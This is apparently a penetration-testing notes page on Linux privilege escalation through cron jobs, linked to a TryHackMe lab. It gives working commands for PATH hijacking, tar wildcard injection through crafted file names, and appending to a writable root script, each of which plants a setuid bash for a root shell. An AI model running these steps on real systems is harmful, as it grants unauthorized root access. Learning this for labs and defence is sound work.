Cron Jobs
/etc/crontab
What are Cron Jobs?
In Linux, scheduled tasks are called cron jobs. Cronjobs are defined in /etc/crontab
(cron table). If we are able to write malicious payload to a script that is executed automatically every minute or so, then this payload will be triggered as root because of the cronjob.
Enumeration
Enumerate crontab:
cat /etc/crontab
For example:

Here five asterisks means "every minute of every day of every week of every month, that command runs", hence overwrite.sh
and /usr/local/bin/compress.sh
will be executed every minute.
If we don't have permission to read /etc/crontab
, pspy can help us identify scheduled tasks as well.
Method 1: Cron Path
Recall the crontab:

Note that overwrite.sh is executed using relative path and the $PATH
variable is:
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
If we create a malicious overwrite.sh
in /home/user
, then this malicious script will be executed as cronjob.
Create a malicious overwrite.sh
in /home/user
:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
Don't forget to give it permission:
chmod +x overwrite.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p
Method 2: Cron Wildcard
Recall the crontab:

Examine the content of /usr/local/bin/compress.sh
:

Notice the wildcard used by tar. This script intends to backup the /home/user
directory. Here we can store a privesc payload in /home/user/runme.sh
and use tar
injection to let cronjob execute the following command:
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh
Create a privesc payload /home/user/runme.sh
:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
Give it permission:
chmod +x /home/user/runme.sh
Prepare tar
injection part 1:
touch /home/user/--checkpoint=1
Prepare tar
injection part 2:
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p
Method 3: Cron File Overwrite
Recall the crontab:

Examine its permission:

Since this script is owned by root and it is executable, we can simply append a privesc payload (or reverse shell payload) to this file and wait for cronjob to execute it.
Ovewrite /usr/local/bin/overwrite.sh with a privesc payload:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
Wait a moment until you believe that this script gets executed. Try getting a root shell:
/tmp/bash -p
Challenge: TryHackMe - CMesS
Last updated
Was this helpful?